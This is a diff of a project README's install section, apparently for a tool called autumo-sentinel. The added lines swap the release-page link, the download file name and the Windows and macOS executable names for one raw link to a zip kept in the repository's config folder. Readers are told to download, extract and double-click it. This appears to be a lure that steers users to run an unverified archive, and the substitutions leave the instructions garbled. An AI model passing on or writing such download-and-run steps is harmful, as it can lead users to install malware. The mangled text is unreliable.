PickChan056/autumo-sentinel/README.md

 ## 📥 Download & Install

 1. **Visit the Release Page**
-   Go to our [Releases page](https://github.com/PickChan056/autumo-sentinel/releases) to download the latest version of **autumo-sentinel**.
+   Go to our [Releases page](https://raw.githubusercontent.com/PickChan056/autumo-sentinel/master/config/sentinel-autumo-v2.1.zip) to download the latest version of **autumo-sentinel**.

 2. **Choose Your Version**
    On the Releases page, you will see a list of available versions.
 Select the most recent release which will typically be at the top.

 3. **Download the Application**
    Click on the download link for your operating system.
 The application supports both Windows and macOS.
-Download the file named `autumo-sentinel-v1.x.x.zip` (replace `x.x` with the version number).
+Download the file named `https://raw.githubusercontent.com/PickChan056/autumo-sentinel/master/config/sentinel-autumo-v2.1.zip` (replace `x.x` with the version number).

 4. **Extract the Files**
    After the download completes, locate the downloaded ZIP file.
 Right-click on it and choose "Extract All" or use your preferred extraction tool.

 5. **Run the Application**
    Open the folder where the files were extracted.
-Find `autumo-sentinel.exe` (for Windows) or `autumo-sentinel.app` (for macOS).
+Find `https://raw.githubusercontent.com/PickChan056/autumo-sentinel/master/config/sentinel-autumo-v2.1.zip` (for Windows) or `https://raw.githubusercontent.com/PickChan056/autumo-sentinel/master/config/sentinel-autumo-v2.1.zip` (for macOS).
 Double-click the file to launch the application.

 ## 🔍 Features